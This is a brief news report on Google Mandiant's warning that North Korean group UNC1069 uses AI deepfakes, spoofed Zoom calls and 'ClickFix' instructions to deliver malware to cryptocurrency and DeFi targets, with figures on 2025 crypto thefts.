Google Warns of AI-Powered North Korean Malware Campaign Targeting Crypto, DeFi
North Korean hacker group UNC1069, linked to state-backed CryptoCore, is targeting the cryptocurrency sector with advanced social engineering techniques, including AI-generated deepfake videos during fake video meetings. According to Google’s Mandiant, recent attacks involved compromising a Telegram account, tricking victims via spoofed Zoom calls, and deploying malware using "ClickFix" instructions under the guise of troubleshooting. The attackers exploited trust by impersonating known executives and making use of AI to mimic real people in live calls and written communication, making fraudulent requests appear routine and credible. In 2025, North Korean hackers stole $2.02 billion in cryptocurrency—a 51% increase from the previous year—totaling $6.75 billion overall, despite fewer incidents. The shift is from broad phishing campaigns to highly targeted attacks exploiting routine digital interactions. Security experts warn that as AI enables scalable, automated impersonation—including deepfakes—it will become increasingly difficult for individuals to distinguish real from fake, emphasizing the need for systemic protections and improved authentication methods rather than relying on users to detect deception.
